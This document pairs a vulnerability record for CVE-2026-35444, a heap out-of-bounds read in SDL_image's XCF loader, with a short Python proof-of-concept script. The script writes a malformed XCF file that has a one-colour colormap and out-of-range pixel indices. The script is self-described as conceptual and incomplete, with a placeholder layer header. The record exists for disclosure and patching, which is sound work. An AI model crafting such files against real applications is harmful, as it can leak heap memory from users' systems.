CVE-2026-35444

import struct # Conceptual PoC to generate a malformed XCF file triggering heap OOB read # This script creates a file with a colormap of size 1, but pixel indices > 0. def create_malformed_xcf(filename): with open(filename, 'wb') as f: # XCF Magic and Header f.write(b'gimp xcf file\x00') f.write(struct.pack('>I', 10)) # Width: 10 f.write(struct.pack('>I', 10)) # Height: 10 f.write(struct.pack('>I', 2)) # Image Type: INDEXED (2) # Properties: PROP_COLORMAP (17) # Define a colormap with only 1 color (cm_num = 1) f.write(struct.pack('>I', 17)) # Property Type: PROP_COLORMAP f.write(struct.pack('>I', 4 + 3 * 1)) # Property Size: 4 bytes length + 3 bytes color f.write(struct.pack('>I', 1)) # Number of colors (cm_num = 1) f.write(b'\xFF\x00\x00') # Color 0: Red # End of Properties f.write(struct.pack('>I', 0)) # PROP_END # Layer Header (Simplified structure for PoC logic) # In a real scenario, valid layer hierarchy is required. # We focus on the Tile data containing the bad index. f.write(b'LAYER') # Placeholder # Tile Data: Writing pixel indices. # Since cm_num is 1, valid indices are 0. # We write 255 (0xFF) to trigger out-of-bounds read. # This data will eventually be used as an index into the colormap. malicious_tile_data = b'\xFF' * 100 f.write(malicious_tile_data) # Note: A fully functional XCF file requires precise adherence to the file format. # This code demonstrates the core logic of the vulnerability: small colormap + large index. create_malformed_xcf('poc_cve_2026_35444.xcf')

{"cve": {"id": "CVE-2026-35444", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:23.003", "lastModified": "2026-04-16T04:41:25.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SDL_image is a library to load images of various formats as SDL surfaces. In do_layer_surface() in src/IMG_xcf.c, pixel index values from decoded XCF tile data are used directly as colormap indices without validating them against the colormap size (cm_num). A crafted .xcf file with a small colormap and out-of-range pixel indices causes heap out-of-bounds reads of up to 762 bytes past the colormap allocation. Both IMAGE_INDEXED code paths are affected (bpp=1 and bpp=2). The leaked heap bytes are written into the output surface pixel data, making them potentially observable in the rendered image. This vulnerability is fixed with commit 996bf12888925932daace576e09c3053410896f8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libsdl:sdl_image:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-04-02", "matchCriteriaId": "B972BD3B-ECC4-45A8-AA8C-04A8643CC6CD"}]}]}], "references": [{"url": "https://github.com/libsdl-org/SDL_image/security/advisories/GHSA-gq8w-x74c-h6p7", "source": "[email protected]", "tags": ["Vendor Advisory", "Patch"]}]}}